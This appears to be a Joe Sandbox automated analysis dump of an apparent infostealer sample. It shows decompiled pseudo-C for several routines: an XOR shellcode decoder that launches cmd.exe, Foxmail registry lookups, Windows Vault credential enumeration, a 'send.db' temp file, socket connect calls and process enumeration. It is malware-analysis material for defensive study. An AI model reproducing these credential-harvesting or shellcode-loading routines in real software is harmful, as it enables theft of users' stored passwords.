Opcode ID: 17124eb63e3461480bb0d44547ee27731a4563c76d7358d62431a8cef5d3268b
Instruction ID: 15080acfafdc455afec958be52a15e4654f54f2d8ff3b00303750730c01a7f86
Opcode Fuzzy Hash: 17124eb63e3461480bb0d44547ee27731a4563c76d7358d62431a8cef5d3268b
Instruction Fuzzy Hash: C9014B71A482108BC345EF6ABD152CA3AB1E789B04B11C13FF028D73E5DB7829D18B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F159 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040F159(void* __ecx) {
				long _v8;
				void* _t7;
				void* _t17;
				void* _t24;
				void* _t26;
				WCHAR* _t31;

				_push(__ecx);
				_t17 = __ecx;
				_t26 = E004010AD(0x800);
				_t24 = _t26;
				_t7 = 0x601;
				do {
					 *_t24 =  *(0x413bf0 + _t24) ^ 0x00000045;
					_t24 = _t24 + 1;
					_t7 = _t7 - 1;
				} while (_t7 != 0);
				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
				GetWindowsDirectoryW(_t31, 0x104);
				E0040102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
				_t5 = _t26 + 0xef; // 0xef
				return  *_t5(_t31, _t17, 0, 0);
			}

0x0040f15c
0x0040f165
0x0040f16c
0x0040f174
0x0040f178
0x0040f17d
0x0040f183
0x0040f185
0x0040f186
0x0040f186
0x0040f197
0x0040f1b1
0x0040f1b9
0x0040f1d1
0x0040f1d9
0x0040f1eb

APIs

Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA

VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 0040F197
VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1AB
GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1B9
lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1C7

Strings

\System32\cmd.exe, xrefs: 0040F1C1

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2244922440-2003734499
Opcode ID: b10fa8982d0daea790bfb56a87a95910784583b089608f3096d0dec34b6f7431
Instruction ID: 0f9499e4239ff946359cd4da6febedf0c1d36d2bf284e6b78ffe54fdf8d70e34
Opcode Fuzzy Hash: b10fa8982d0daea790bfb56a87a95910784583b089608f3096d0dec34b6f7431
Instruction Fuzzy Hash: E30124717802117BE22157A59D46FAB3B9CCB89B41F004036F305FA1C1C9E9A90087AC

Uniqueness

Uniqueness Score: -1.00%

Function 004088BB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004088BB(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x4167b8,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x4167b8);
						_t7 = 1;
					}
				}
				return _t7;
			}

0x004088de
0x00408912
0x00408912
0x004088e0
0x004088e3
0x00408905
0x00000000
0x00408907
0x00408908
0x0040890e
0x0040890e
0x00408905
0x00408916

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 004088D6
RegQueryValueExA.ADVAPI32 ref: 004088FD
PathRemoveFileSpecA.SHLWAPI(004167B8), ref: 00408908

Strings

Executable, xrefs: 004088F5
software\Aerofox\FoxmailPreview, xrefs: 004088CC

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FileOpenPathQueryRemoveSpecValue
String ID: Executable$software\Aerofox\FoxmailPreview
API String ID: 3687894118-2371247776
Opcode ID: c56086577de6cb68103ad096c498ee7b38cda4bedee5f54508016ccb2ee7c8b3
Instruction ID: 99faddbd660e9f92ff0d39bde148903884fb3c643bb86008af766538127eb9d9
Opcode Fuzzy Hash: c56086577de6cb68103ad096c498ee7b38cda4bedee5f54508016ccb2ee7c8b3
Instruction Fuzzy Hash: CFF0A7B4240204BAEF10AB50DD46FEF3BAC9745B04F10416AB501F21D2D7F49B41E52D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D105 Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 0040D122
socket.WS2_32(00000002,00000001,00000000), ref: 0040D133
gethostbyname.WS2_32(?), ref: 0040D141
htons.WS2_32(?), ref: 0040D167
connect.WS2_32(00000000,?,00000010), ref: 0040D17A

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Startupconnectgethostbynamehtonssocket
String ID:
API String ID: 2405761414-0
Opcode ID: 29bafcd25dc25a381aa7b92104a4ff7c39bde2dd6ab1b6b01bf3cfe734db5acd
Instruction ID: 61c4d67538dccba4f4b88579259b8d97a44ccd2e8883c1dd59be44d551050d24
Opcode Fuzzy Hash: 29bafcd25dc25a381aa7b92104a4ff7c39bde2dd6ab1b6b01bf3cfe734db5acd
Instruction Fuzzy Hash: F301D6717003056BD310DBB5AC49EABB7ACEF44721F00463BFD54D71E1E6B48919839A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E764 Relevance: 7.5, APIs: 5, Instructions: 44
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040E764(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				int _t9;
				void* _t15;
				void* _t19;
				signed int* _t20;

				_t15 = __edx;
				_v560 = 0x22c;
				_t20 = __ecx;
				_t19 = CreateToolhelp32Snapshot(2, 0);
				if(_t19 == 0xffffffff) {
					L6:
					 *_t20 =  *_t20 & 0x00000000;
				} else {
					_push( &_v560);
					_t9 = Process32FirstW(_t19);
					while(_t9 != 0) {
						if(_v552 == _t15) {
							CloseHandle(_t19);
							E004033AB(_t20,  &_v524);
						} else {
							_t9 = Process32NextW(_t19,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t19);
					goto L6;
				}
				L7:
				return _t20;
			}

0x0040e774
0x0040e776
0x0040e780
0x0040e788
0x0040e78d
0x0040e7c0
0x0040e7c0
0x0040e78f
0x0040e795
0x0040e797
0x0040e7b5
0x0040e7a5
0x0040e7cb
0x0040e7da
0x0040e7a7
0x0040e7af
0x00000000
0x0040e7af
0x00000000
0x0040e7a5
0x0040e7ba
0x00000000
0x0040e7ba
0x0040e7c4
0x0040e7c9

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E782
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E797
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E7AF
CloseHandle.KERNEL32(00000000), ref: 0040E7BA
CloseHandle.KERNEL32(00000000), ref: 0040E7CB

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: 15901066c97be2484c5650acb9a592a2fdc96c9d25de0ac2de4f395fe8e59fe2
Instruction ID: c5b5f033920b13882c0739d2e3bae2d1bc0c642545de4a6447579076702dad48
Opcode Fuzzy Hash: 15901066c97be2484c5650acb9a592a2fdc96c9d25de0ac2de4f395fe8e59fe2
Instruction Fuzzy Hash: 65018631600214BBD7249BB6AD4CBBFBABCDB45721F10447AE605E31D0DBB88D518A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4B5 Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4B5(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xac));
				 *((intOrPtr*)(_t18 + 0xac)) = 0;
				FreeLibrary( *(_t18 + 0xa0));
				 *(_t18 + 0xa0) = 0;
				FreeLibrary( *(_t18 + 0xa4));
				 *(_t18 + 0xa4) = 0;
				FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				return _t15;
			}

0x0040a4be
0x0040a4c6
0x0040a4d0
0x0040a4d6
0x0040a4de
0x0040a4e4
0x0040a4ec
0x0040a4f2
0x0040a4fa
0x0040a500
0x0040a502
0x0040a50b

APIs

FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4C6
FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4D6
FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4E4
FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4F2
FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A500

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
Instruction ID: 71d699067d81a156cb771d2a1ac33f1489cf9796781138b2e1d61bf39ca45e0e
Opcode Fuzzy Hash: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
Instruction Fuzzy Hash: A9F0A575B01B16BED7095F759C84B86FE65FF4A260F01422B966C42211CBB16430DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 0040A139 Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A139(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xac));
				 *((intOrPtr*)(_t18 + 0xac)) = 0;
				FreeLibrary( *(_t18 + 0xa0));
				 *(_t18 + 0xa0) = 0;
				FreeLibrary( *(_t18 + 0xa4));
				 *(_t18 + 0xa4) = 0;
				FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				return _t15;
			}

0x0040a142
0x0040a14a
0x0040a154
0x0040a15a
0x0040a162
0x0040a168
0x0040a170
0x0040a176
0x0040a17e
0x0040a184
0x0040a186
0x0040a18f

APIs

FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A14A
FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A15A
FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A168
FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A176
FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A184

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
Instruction ID: 71d699067d81a156cb771d2a1ac33f1489cf9796781138b2e1d61bf39ca45e0e
Opcode Fuzzy Hash: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
Instruction Fuzzy Hash: A9F0A575B01B16BED7095F759C84B86FE65FF4A260F01422B966C42211CBB16430DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00409D15 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00409D15(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0040A06B(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x416140);
					if( *((intOrPtr*)(__ecx + 0x84))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0040A038(_t240);
									_push(0x10);
									_push(0x416130);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E00401000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E004033AB( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E0040300E( &_v32, E004033AB( &_v64, L"Internet Explorer"));
											E004058FB(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x4147c0]");
												asm("movups [ebp-0x60], xmm0");
												E004031FD( &_v100, E004033AB( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E004058FB(_v68);
												_v68 = _t234;
												E004031FD( &_v96, E004033AB( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E004058FB(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x90))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E004031FD( &_v84, E004033AB( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E004058FB(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00401ED8(_t235,  &_v100);
												E00401F0E(_t186);
												E0040138F( &_v100);
											}
											E004058FB(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E00401000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E004033AB( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E0040300E( &_v24, E004033AB( &_v48, L"Internet Explorer"));
											E004058FB(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x4147c0]");
												asm("movups [ebp-0x60], xmm0");
												E004031FD( &_v100, E004033AB( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E004058FB(_v52);
												_v52 = _t234;
												E004031FD( &_v96, E004033AB( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E004058FB(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x90))() == 0) {
													_v8 = _v12;
													E004031FD( &_v92, E004033AB( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E004058FB(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00401ED8(_t235,  &_v100);
												E00401F0E(_t186);
												E0040138F( &_v100);
											}
											E004058FB(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0x98))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x88))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xb8));
				E004058FB(_t234);
				E004058FB(0);
				return E004058FB(0);
			}

0x00409d1d
0x00409d1f
0x00409d22
0x00409d24
0x00409d27
0x00409d2a
0x00409d2d
0x00409d30
0x00409d33
0x00409d3d
0x00409d46
0x00409d47
0x00409d48
0x00409d55
0x00409d5e
0x00409d62
0x00409d63
0x00409d68
0x00409d73
0x00409d7c
0x00409d7e
0x00409d84
0x00409d87
0x00409d8a
0x00409d8d
0x00409d8d
0x00409d92
0x00409d94
0x00409d9b
0x00409ebf
0x00409ec0
0x00409ec3
0x00409ec8
0x00409ecb
0x00409ecd
0x00409edc
0x00409ef2
0x00409efc
0x00409f01
0x00409f04
0x00409f06
0x00409f12
0x00409f19
0x00409f2d
0x00409f35
0x00409f43
0x00409f50
0x00409f58
0x00409f60
0x00409f64
0x00409f6d
0x00409f77
0x00409f7d
0x00409f7f
0x00409f8a
0x00409f90
0x00409f9d
0x00409fa5
0x00409faa
0x00409faa
0x00409fad
0x00409fb6
0x00409fbd
0x00409fc5
0x00409fc5
0x00409fcd
0x00409fd2
0x00000000
0x00409fd2
0x00409da1
0x00409da4
0x00409da7
0x00409da8
0x00409dab
0x00409db0
0x00409db5
0x00409dc1
0x00409dd7
0x00409de1
0x00409de6
0x00409deb
0x00409df1
0x00409df7
0x00409dfe
0x00409e12
0x00409e1a
0x00409e28
0x00409e35
0x00409e3d
0x00409e45
0x00409e48
0x00409e49
0x00409e4a
0x00409e4b
0x00409e4c
0x00409e4f
0x00409e52
0x00409e55
0x00409e56
0x00409e61
0x00409e69
0x00409e7c
0x00409e84
0x00409e89
0x00409e89
0x00409e8c
0x00409e95
0x00409e9c
0x00409ea4
0x00409ea4
0x00409eac
0x00409eb1
0x00409fd5
0x00409fd5
0x00409fd5
0x00409db5
0x00409fdb
0x00409fdf
0x00409fe0
0x00409fe4
0x00409fe7
0x00409ff0
0x00409ff0
0x00409d7e
0x00409d73
0x00409d55
0x00409ff7
0x00409ffc
0x00409ffc
0x0040a006
0x0040a00c
0x0040a00c
0x0040a018
0x0040a020
0x0040a027
0x0040a037

APIs

Part of subcall function 0040A06B: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040A073

FreeLibrary.KERNEL32(?), ref: 0040A018

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 0040300E: lstrcmpW.KERNEL32(?,?), ref: 00403018

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Strings

4, xrefs: 00409FE0
8, xrefs: 00409FDB
Internet Explorer, xrefs: 00409DC6, 00409EE1

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
String ID: 4$8$Internet Explorer
API String ID: 708496175-747916358
Opcode ID: 83ea670e64d5cb21433631d671bd2a9a3595ebe1fe406b078e82ef2790373a8c
Instruction ID: d6e6ed69a0d1030da036c5e31fcde384690f90dc3ec3a168eb29360f78ef386c
Opcode Fuzzy Hash: 83ea670e64d5cb21433631d671bd2a9a3595ebe1fe406b078e82ef2790373a8c
Instruction Fuzzy Hash: 03A12071D00619ABCF04EFA6C8959EEBB79FF44305F10402AF805B7292DB38AE55DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00410898 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00410898(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E00401052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E004031FD(_t37 + 4, E004033AB( &_v8,  &_v2080));
				E004058FB(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0040343F(E00403527( &_v32, _t35, _t38),  *_t8, _a4);
				E0040342B( &_v32);
				return _a4;
			}

0x00410898
0x004108b2
0x004108b4
0x004108c4
0x004108d6
0x004108e2
0x004108f1
0x004108f9
0x00410901
0x00410901
0x00410908
0x0041090b
0x00410913
0x0041091e
0x00410926
0x00410931

APIs

GetTempPathW.KERNEL32(00000400,?), ref: 004108C4
lstrcatW.KERNEL32 ref: 004108D6

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

5, xrefs: 0041090B
send.db, xrefs: 004108CA

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
String ID: 5$send.db
API String ID: 891666058-2022884741
Opcode ID: 2e83ca42c7ddf60e184d2c6e61082ebea31056ff0cc13da8152b21cf05e2b563
Instruction ID: f57ce377c97b75718f04c6484f3f53e292781d36d0101067abc2075b94b27c93
Opcode Fuzzy Hash: 2e83ca42c7ddf60e184d2c6e61082ebea31056ff0cc13da8152b21cf05e2b563
Instruction Fuzzy Hash: 40015E71D0011CABCB10EB65DC46BEEBBBCAF55309F00807AB505B6091EF789B56CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E649 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040E649(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t9;
				intOrPtr* _t10;
				intOrPtr _t23;
				void* _t30;

				_t30 = __eflags;
				_t9 = E0040E476();
				_push(__ecx);
				_t10 = E0040E579(_t9, "VirtualQuery", _t30);
				if(_t10 != 0) {
					_t10 =  *_t10(E0040E649,  &_v44, 0x1c);
					_t23 = _v40;
					_t32 = _t23;
					if(_t23 != 0) {
						E0040E2EC(_t23, _t32);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t23);
						_v12 = 0;
						E0040E6C4( &_v16, _t32, E004033AB( &_v8, L"C:\\Users\\louis\\Documents\\workspace\\MortyCrypter\\MsgBox.exe"),  &_v12);
						E004058FB(_v8);
						_v8 = 0;
						return E004058FB(0);
					}
				}
				return _t10;
			}

0x0040e649
0x0040e650
0x0040e655
0x0040e65d
0x0040e665
0x0040e672
0x0040e674
0x0040e677
0x0040e679
0x0040e67b
0x0040e68b
0x0040e691
0x0040e695
0x0040e6aa
0x0040e6b2
0x0040e6b9
0x00000000
0x0040e6bc
0x0040e679
0x0040e6c3

APIs

Part of subcall function 0040E579: lstrcmpA.KERNEL32(?,?,?,0040A3BD,?,?,00000104,00000000), ref: 0040E5B2

MessageBoxA.USER32 ref: 0040E68B

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 0040E6C4: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040E6FF

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

C:\Users\louis\Documents\workspace\MortyCrypter\MsgBox.exe, xrefs: 0040E699
VirtualQuery, xrefs: 0040E656
Bla2, xrefs: 0040E682, 0040E688, 0040E689

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
String ID: Bla2$C:\Users\louis\Documents\workspace\MortyCrypter\MsgBox.exe$VirtualQuery
API String ID: 1196126833-430247600
Opcode ID: a6867b57453382faa7294a4e82b85834bd000ec9836fb0b52c152156ef19a725
Instruction ID: 262eba1185e5246f796a0a0cd151821592391dc29fb670a253c8ff67aa86d558
Opcode Fuzzy Hash: a6867b57453382faa7294a4e82b85834bd000ec9836fb0b52c152156ef19a725
Instruction Fuzzy Hash: 45F08F71A002086ACB18FBA7EC52CEF7A6C8F44304B10487EB801B21C1DF384A6086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D22A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D22A() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}

0x0040d238
0x0040d242
0x0040d24a
0x0040d265
0x0040d265
0x0040d26a
0x0040d278
0x00000000
0x00000000
0x00000000
0x0040d24c
0x0040d252
0x0040d25a
0x0040d270
0x0040d273
0x0040d25c
0x0040d263
0x00000000
0x0040d263
0x0040d25a

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D242
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D252

Strings

ntdll.dll, xrefs: 0040D233
RtlGetVersion, xrefs: 0040D24C

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 64967091012ca3be463ff2ce303d0a86b5d73f2fd2893906bdc5862f7497788f
Instruction ID: 117b20f967412b430907f56f7d035ec3b17419d1650f063edd3172b71aa5bef5
